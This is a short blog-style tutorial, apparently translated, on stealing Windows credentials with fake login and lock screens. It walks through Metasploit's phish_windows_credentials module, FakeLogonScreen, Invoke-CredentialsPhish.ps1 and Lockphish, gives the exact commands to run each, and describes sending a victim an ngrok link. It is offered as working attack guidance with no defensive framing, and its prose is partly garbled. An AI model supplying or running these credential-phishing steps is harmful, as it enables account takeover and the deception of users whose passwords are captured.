Stealing Windows credentials

In this article we will look at various scenarios for obtaining passwords on a Windows system.

Metasploit

Metasploit comes with a built-in module that helps us carry out a clear text attack on user credentials. Since this is a post-production module, it simply needs to be associated with the current session. To use this module, enter:

use post/windows/gather/phish_windows_credentials
set session 1
exploit

This module waits for the user to start a new process. Once the process starts, a fake Windows Security dialog box will open asking for user credentials as shown in the image below:

When the user enters their credentials, they will be displayed as shown in the image below:

FakeLogonScreen

A similar result can be obtained using a fake system lock screen. Tool FakeLogonScreen developed in C#, and allows you to get credentials in its pure form. We will be running this tool remotely using Metasploit

upload /root/FakeLogonScreen.exe .
shell
FakeLogonScreen.exe

Once executed, it will simulate the Windows lock screen to get the password from the user as shown in the image below:

It will check the credentials locally or with the domain controller as the user enters them and then display them on the console as shown in the image below:

SharpLocker

This tool very similar to the previous one.

PowerShell: Invoke-CredentialsPhish.ps1

To run scriptenter:

Import-Module C:\Users\raj\Desktop\Invoke-CredentialsPhish.ps1
Invoke-CredentialsPhish

When you run the above commands, you will be prompted to enter your credentials as shown in the image below:

So, once the user enters the credentials, they will be displayed on the screen as shown in the image below:

Lockphish

Lockphish is another tool that allows us to obtain credentials. Run the tool using the following command:

./lockphish.sh

It will generate a public link using ngrok as shown in the image above, this link needs to be shared with the victim.

After launching the downloaded file, the lock screen will work and the user will be forced to enter credentials. And we will have the powers as shown in the image below:

We can use various options to obtain the credentials of the target system. The PowerShell method is best for validating credentials because the prompt does not close until the correct credentials are entered. All tools have their advantages and disadvantages, but they are all quite good and work.

We are on telegram.

Similar Posts

Leave a Reply

Your email address will not be published. Required fields are marked *